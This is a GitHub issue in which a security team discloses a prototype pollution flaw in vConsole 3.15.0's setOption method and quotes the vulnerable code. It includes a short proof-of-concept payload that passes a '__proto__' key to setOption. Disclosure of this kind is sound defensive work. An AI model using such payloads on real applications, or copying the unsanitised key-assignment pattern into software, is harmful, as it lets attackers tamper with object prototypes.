Skip to content

Prototype Pollution in core.ts #616

New issue
Jump to bottom
New issue
Jump to bottom
Closed
Closed
Prototype Pollution in core.ts#616
Labels
Done
@zer0dia

Description

@zer0dia
zer0dia
opened on Apr 4, 2023

hello.
This is LINE Security Assessment Team.
Share the security vulnerabilities we found.
CC. @03sunf, @shpik-kr

vConsole Version: 3.15.0

issue

vConsole/src/core/core.ts

Lines 519 to 542 in 346ae64

public setOption(keyOrObj: any, value?: any) {
if (typeof keyOrObj === 'string') {
// parse `a.b = val` to `a: { b: val }`
const keys = keyOrObj.split('.');
let opt: any = this.option;
for (let i = 0; i < keys.length - 1; i++) {
if (opt[keys[i]] === undefined) {
opt[keys[i]] = {};
}
opt = opt[keys[i]];
}
opt[keys[keys.length - 1]] = value;
this._triggerPluginsEvent('updateOption');
this._updateComponentByOptions();
} else if (tool.isObject(keyOrObj)) {
for (let k in keyOrObj) {
this.option[k] = keyOrObj[k];
}
this._triggerPluginsEvent('updateOption');
this._updateComponentByOptions();
} else {
console.debug('[vConsole] The first parameter of `vConsole.setOption()` must be a string or an object.');
}
}

Possible prototype pollution due to incorrect key and value resolution in setOptions in core.ts.

poc

var vConsole = new window.VConsole();
vConsole.setOption("__proto__.foo","bar");
vConsole.setOption("__proto__.noOrig",1);
console.log(Object.prototype.foo);

Metadata

Assignees

No one assigned

    Labels

    Done

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions